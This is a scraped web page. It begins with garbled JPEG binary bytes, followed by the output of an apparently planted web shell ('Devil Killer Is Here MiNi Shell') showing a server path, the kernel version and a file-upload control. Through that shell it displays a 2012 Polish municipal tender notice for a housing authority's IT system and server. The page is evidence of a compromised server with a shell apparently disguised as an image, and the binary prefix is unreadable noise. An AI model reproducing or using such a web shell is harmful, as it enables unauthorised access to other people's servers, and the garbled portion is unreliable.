JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120914/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120914/348370-N-2012.html

<p class="kh_header"><b>Świętochłowice: Dostawa i wdrożenie zintegrowanego systemy informatycznego ZSI oraz dostawa i konfiguracja serwera dla Miejskiego Zarządu Budynków Mieszkalnych w Świętochłowicach</b><br>
<b>Numer ogłoszenia: 348370 - 2012; data zamieszczenia: 14.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zarząd Budynków Mieszkalnych , ul. Tunelowa 2, 41-600 Świętochłowice, woj. śląskie, faks (032) 245 48 44.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> mzbm.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa i wdrożenie zintegrowanego systemy informatycznego ZSI oraz dostawa i konfiguracja serwera dla Miejskiego Zarządu Budynków Mieszkalnych w Świętochłowicach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:
Dostawa i wdrożenie zintegrowanego systemu informatycznego ZSI, wspierającego pracę Zamawiającego oraz dostawę i konfigurację serwera obejmujące:
A Oprogramowanie sieciowe - autorski zintegrowany pakiet systemów do zarządzania nieruchomościami, wykonany w jednakowej technologii bazodanowej, który powinien obejmować następujące obszary funkcjonalne:
- Finanse-Księgowość 
- Sprawozdawczość finansowa
- Rozliczanie kosztów
- Naliczenia opłat
- Rozliczanie mediów
- Rozliczanie mediów - woda 
- Eksploatacja i Remonty
- Kadry z ewidencją czasu pracy
- Płace
- Gospodarka Materiałowa
- Środki Trwałe
- Wspólnoty mieszkaniowe
- Ewidencja zasobów
- Aplikacja internetowa
B Usługi wdrożeniowe niezbędne do uruchomienia i późniejszej eksploatacji systemu obejmujące:
- instalację i konfigurację oprogramowania na stacjach roboczych - 80 stanowisk, w tym ok. 20 się poza siedzibą Zamawiającego
- wdrożenie systemu 
- dostarczenie kompletnej instrukcji obsługi wszystkich modułów w formie elektronicznej oraz dla każdego modułu przynajmniej po jednej w formie papierowej 
- przeniesienie danych katalogowych z systemów do tej pory użytkowanych przez Zamawiającego do nowego systemu 
- szkolenia ogólne - 80 pracowników w grupach po 20 pracowników - minimum 4 godz. każda grupa
- szkolenia stanowiskowe pracowników wytypowanych do obsługi konkretnych modułów - 80 pracowników w grupach po 3-5 pracowników, ilość godzin uzależniona od rodzaju stanowiska
- szkolenia administratora systemu - 1 pracownik, minimum 60 godzin
C Dostawę i konfigurację serwera:
- serwer musi być nowy
- Zamawiający nie dopuszcza tzw. składaków -wszystkie podzespoły serwera muszą być zainstalowane firmowo przez producenta serwera. 
- oprogramowanie serwera po skonfigurowaniu powinno umożliwiać:
    - bezproblemową oraz bezawaryjną pracę dostarczonego ZSI;
    - bezproblemową oraz bezawaryjną pracę z istniejącą siecią oraz pracującym w niej serwerem - serwer plików oparty na systemie operacyjnym Slackware Linux 12.2.0 i Samba 3.2.15 - zawierającym dane programów do tej pory użytkowanych, serwer ten będzie pracować równolegle;
    - dostęp poprzez Internet - DSL 4Mb/s/1Mb/s do danych ze stacji roboczych usytuowanych poza siedzibą Zamawiającego - ok. 20 stacji;
OGÓLNE WYMAGANE CECHY SYSTEMU I SERWERA
1.	Oferowany zintegrowany system informatyczny musi:
- spełniać wszystkie wymagania wymienione w pkt 3 oraz spełniać wszystkie wymagania szczegółowe wymienione w pkt 7.1 zaznaczone jako wymagalne W;
- bezterminową licencję na użytkowanie;
- umożliwić jednoczesny dostęp do bazy danych dla minimum 35 użytkowników.
2. Zamawiający zastrzega sobie możliwość wezwania Oferenta do przeprowadzenia prezentacji zaoferowanego Zintegrowanego Systemu Informatycznego ZSI w celu potwierdzenia, że system jest zgodny ze specyfikacją przedmiotu zamówienia. Wszystkie koszty związane z przygotowaniem ZSI do prezentacji oraz koszty przyjazdu do siedziby Zamawiającego ponosi Oferent. Prezentacja powinna się odbyć w terminie 7 dni od zgłoszenia przez Zamawiającego takiej konieczności.
3. Wymagania techniczno-technologiczne dla ZSI:
Zintegrowany system musi charakteryzować się następującymi ogólnymi cechami:
- Dopuszcza się jedynie rozwiązania oparte o relacyjną bazę danych, wykorzystującą język SQL;
- Zamawiający musi mieć pełen dostęp do zawartych w bazie informacji;
- umożliwiać bezawaryjną pracę na stacjach roboczych z zainstalowanym systemem operacyjnym Windows XP Home SP 3 lub Pro SP 3 wyposażonych w procesor 800MHz -i wyższe, oraz w 256MB RAM -i więcej;
- umożliwiać dostęp poprzez Internet -DSL 4Mb/s/1Mb/s- do danych ze stacji roboczych usytuowanych poza siedzibą Zamawiającego;
- musi być oparty o  jedną bazę kontrahentów i zapewniać automatyczny, bez konieczności wykonywania przez użytkowników operacji eksportu i importu danych, przepływ danych wykorzystywanych przez poszczególne moduły -przede wszystkim w zakresie księgowości budżetowej, danych o płatnikach, o sprzedaży mediów, o rozrachunkach, danych potrzebnych do sporządzania analiz finansowo-ekonomicznych;
- musi być oparty o wspólne słowniki, takie jak standardowy słownik miast, ulic, jednostek miar, banków;
- zapewniać ciągły dostęp do aktualnych danych zapewniając natychmiastową aktualizację informacji w bazach danych podczas rutynowych czynności wykonywanych na stanowiskach pracy;
- zapewnić kontrolę poprawności wprowadzania danych przez wykorzystanie słowników systemowych oraz walidację poprawności wprowadzanych danych;
- posiadać zabezpieczenia przed skasowaniem danych, które są powiązane z innymi danymi w systemie lub ich ostateczność została potwierdzona w inny sposób - poprzez odpowiednio wysoki status, przynależność do już zamkniętego miesiąca, itp.;
- posiadać mechanizmy kontroli spójności wprowadzanych danych, w tym wymuszanie pól obowiązkowych;
- spełniać wymogi polskiego prawa, a w szczególności ustawy o rachunkowości i rozliczeniach podatkowych oraz ustawy o ochronie danych osobowych;
- być wyposażony w polskojęzyczny interfejs - wszystkie komunikaty, menu, raporty, pomoc kontekstowa, okna do wprowadzania danych, podpowiedzi, zapytania, instrukcje dla użytkownika i inne;
- być systematycznie aktualizowany, zgodnie ze zmieniającymi się trendami i przepisami; 
- być oprogramowaniem autorskim firmy, we wszystkich jego obszarach funkcjonalnych, co pozwoliłoby na przeprowadzanie ewentualnych modyfikacji i zmian w oprogramowaniu pod potrzeby Zamawiającego;
- posiadać rozbudowane możliwości parametryzacyjne, elastyczność oprogramowania, umożliwiające dostosowanie systemu do potrzeb i specyfiki Zamawiającego;
- być systemem w pełni zintegrowanym, umożliwiającym dostęp do informacji bezpośrednio po jej wprowadzeniu w różnych przekrojach i szybki podgląd z różnych poziomów;
- posiadać rozbudowany system raportowania, z możliwością dowolnego definiowania raportów oraz wykonywania wszelkiego rodzaju analiz na wprowadzonych danych oraz możliwością prezentowania stworzonych analiz w formie graficznej; 
- okna prezentujące dane w postaci tabelarycznej muszą być wyposażone w funkcjonalności sortowania według wybranych kolumn oraz zakładania przez użytkownika filtra wyświetlanej zawartości;
- umożliwiać przeniesienie wygenerowanych raportów, zestawień do Excela, Worda oraz umożliwiać zapis z formacie PDF; 
- posiadać  system kontroli uprawnień użytkowników, do funkcji i danych przechowywanych przez system, w tym możliwość tworzenia grup użytkowników;
- umożliwiać pełne przechowywanie informacji o użytkownikach wprowadzających i zmieniających dane -pełna historia wprowadzonych zmian;
- przejście z jednego modułu do drugiego, w ramach uprawnień użytkownika, następuje bez konieczności ponownego logowania się do następnego modułu - dostęp do wszystkich przyznanych użytkownikowi zasobów systemu ma być zapewniony po jednokrotnym wpisaniu identyfikatora - nazwy -użytkownika i jego hasła;
- posiadać możliwość generowania wydruków na drukarkach igłowych w trybie tekstowym;
- posiadać możliwość dostosowania programu do każdej usługi e-Bankowości -elektroniczne przelewy;
- umożliwiać bezproblemową zmianę na walutę Euro, w przypadku przystąpienia Polski do unii monetarnej;
- firma wdrażająca system zobowiązana jest zapewnić w okresie gwarancyjnym opiekę serwisową, pomoc specjalistów z różnych dziedzin informatyki oraz szybką pomoc, szczególnie w sytuacjach awaryjnych;
- mieć możliwość pełnej archiwizacji danych oraz możliwość łatwego odtworzenia danych w razie awarii;
4. Warunki oraz wymagania dotyczące serwera:
Serwer musi spełniać wymagania szczegółowe wymienione w punkcie 7.2. 
Oprogramowanie niezbędne do poprawnego funkcjonowania serwera, obsługi stacji roboczych, w tym stacji roboczych poza siedzibą Zamawiającego oraz poprawnego działania bazy danych powinno być zainstalowane oraz skonfigurowane.
5. Ogólne warunki użytkowania:
System powinien bezproblemowo obsłużyć:
- 80 stacji roboczych, w tym ok. 20 znajdujących się poza siedzibą Zamawiającego,
- minimum 600 budynków,
- minimum 6000 lokali mieszkalnych,
- minimum 1000 lokali niemieszkalnych,
- minimum 150 wspólnot mieszkaniowych,
- minimum 150 pracowników.
6. Warunki oraz wymagania dotyczące Oferenta:
Oferent musi spełniać następujące warunki:
- zapewnić dostarczenie, instalację i parametryzację zintegrowanego systemu do zarządzania,  w którego skład wchodzi: autorskie oprogramowanie do zarządzania nieruchomościami,
- zapewnić wsparcie w okresie wdrożenia jak i rok po ukończeniu wdrożenia, przez wsparcie rozumie się pomoc Wykonawcy poprzez specjalistów z różnych dziedzin związanych z informatyką,
- w sytuacjach awaryjnych zapewnić bezzwłoczną reakcję, oczekiwanie na reakcję nie powinno przekroczyć 24 godzin - licząc od momentu zgłoszenia awarii, a termin usunięcia awarii nie powinien przekroczyć 48 godzin; przez sytuację awaryjną rozumie się całkowity brak możliwości korzystania przez Zamawiającego z przynajmniej jednego modułu ZSI, 
- posiadać siedzibę lub oddział w odległości nie większej niż 30 km od siedziby Zamawiającego, w celu zapewnienia bezpośredniej i szybkiej reakcji na problemy wynikłe w trakcie eksploatacji ZSI  przez Zamawiającego poprzez osobiste wsparcie specjalistów, o których mowa powyżej.
Szczegółowe wymagane cechy systemu i serwera zawarte zostały w Rozdziale 3 - opis przedmiotu zamowienia, pkt. 7 SIWZ.
Wskazanie nazw zwyczajowych czy producentów w zamieszczonych elementach opisu przedmiotu zamówienia służy wyłącznie określeniu standardu.
Zamawiający dopuszcza rozwiązania równoważne opisanym. Wykonawca, który powołuje się na rozwiązania równoważne opisanym przez Zamawiającego, jest obowiązany wykazać, że oferowane przez niego dostawy, usługi spełniają wymagania określone przez Zamawiającego. W takiej sytuacji Zamawiający wymaga złożenia stosownych dokumentów, potwierdzających spełnianie wymagań..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 48.00.00.00-8, 48.61.00.00-7, 48.82.00.00-2, 72.26.30.00-6, 80.53.31.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 6.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Ustala się obowiązek wniesienia przez  Wykonawcę wadium w              wysokości 5.400,00 zł, słownie: pięć tysięcy czterysta złotych 00 groszy.
2. Wadium wnosi się przed upływem terminu składania ofert.
3. Wadium może być wnoszone w jednej lub kilku następujących formach:
- pieniądzu, 
- poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
- gwarancjach bankowych,
- gwarancjach ubezpieczeniowych,
- poręczeniach udzielanych przez podmioty, o których mowa a art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości, t.j. Dz.U. z 2007 r. Nr 42, poz. 275 z późn. zm.
4. Ustala się następujące sposoby wniesienia wadium:
- przelew na rachunek bankowy Miejskiego Zarządu Budynków Mieszkalnych w ING Bank Śląski S.A. Katowice OŚwiętochłowice, nr konta: 26 1050 1243 1000 0023 4509 3898 dokonany skutecznie przed upływem terminu składania ofert - dotyczy formy pieniężnej,
- wadium w pozostałych formach wnosi się do kasy Miejskiego Zarządu Budynków Mieszkalnych w Świętochłowicach przy ul. Tunelowej 2.
5. Dokument stanowiący dowód poświadczenia o wniesieniu wadium powinien zawierać zapis: Wadium w postępowaniu  na dostawę i wdrożenie zintegrowanego systemu informatycznego ZSI oraz dostawę i konfigurację serwera dla Miejskiego Zarządu Budynków Mieszkalnych w Świętochłowicach
6. W przypadku składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia wadium może być wniesione przez dowolny podmiot, podmioty. Z dokumentu wadialnego lub innego dokumentu załączonego do oferty powinno wynikać, w imieniu jakiego Wykonawcy wadium jest wnoszone.
7. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.
8. Zamawiający zwróci niezwłocznie wadium według zasad określonych w art. 46 ustawy Pzp.
9. Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez  Wykonawcę.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, gdy Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał minimum 5 wdrożeń ZSI w jednostkach budżetowych,  w tym 3 zarządzającymi lokalami i wspólnotami mieszkaniowymi. Wykaże się 1 wdrożeniem w podmiocie zarządzającym lokalami posiadającymi przynajmniej 600 budynkami, 150 wspólnotami mieszkaniowymi, 6.000 lokali mieszkalnych oraz 1000 lokali niemieszkalnych.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, gdy Wykonawca będzie:
- posiadał co najmniej  15 programistów z co najmniej dwuletnim stażem w zakresie programowania oferowanego lub podobnego oprogramowania  zapewniających możliwość modyfikacji pod potrzeby klienta i rozwój produktu,
- posiadał co najmniej 20 specjalistów ds. wdrożeń z co najmniej dwuletnim stażem w zakresie programowania oferowanego lub podobnego oprogramowania, zapewniającymi sprawne wdrożenie oraz bezpieczną obsługę informatyczną, 
- gdy Wykonawca posiada oddziały,  a w najbliższym oddziale, który przejmie wsparcie Zamawiającego powinien dysponować przynajmniej 4 specjalistami jw;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, gdy Wykonawca wykaże, iż posiada opłaconą polisę od odpowiedzialności cywilnej z tytułu prowadzonej działalności gospodarczej na wartość minimum 200 000,00 zł, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej z tytułu prowadzonej działalności gospodarczej.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W przypadku, gdy Wykonawca powołuje się na rozwiązania równoważne odnoszące się do elementów opisu przedmiotu zamówienia, zobowiązany jest do złożenia dokumentów, potwierdzających spełnianie określonych przez Zamawiającego wymagań.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>formularz ofertowy, pełnomocnictwo do reprezentowania Wykonawcy, podpisującego ofertę lub poświadczającego za zgodność z oryginałem, jeżeli wynika ono z dokumentów rejestracyjnych,ewidencyjnych Wykonawcy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Ocena funkcjonalności - 40</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>- zmiany stawki podatku VAT. Zmiana taka obejmować będzie wynagrodzenie za tą część zamówienia, która zrealizowana zostanie po dniu wejścia w życie stosownej zmiany wysokości podatku.
- uzasadnionej przyczynami technicznymi konieczności zmiany sposobu wykonania Umowy, korzystnej dla Zamawiającego, 
- zmiany w infrastrukturze Zamawiającego, 
- wynikającej ze specyfiki działalności Zamawiającego potrzeby w zakresie zmiany terminów wykonania i odbioru poszczególnych prac.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mzbm.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Zarząd Budynków Mieszkalnych w Świętochłowicach, ul. Tunelowa 2, 41-600 Świętochłowice - pokój nr 8..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.10.2012 godzina 09:00, miejsce: Miejski Zarząd Budynków Mieszkalnych w Świętochłowicach przy ul. Tunelowej 2 - Kancelaria pokój nr 7.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





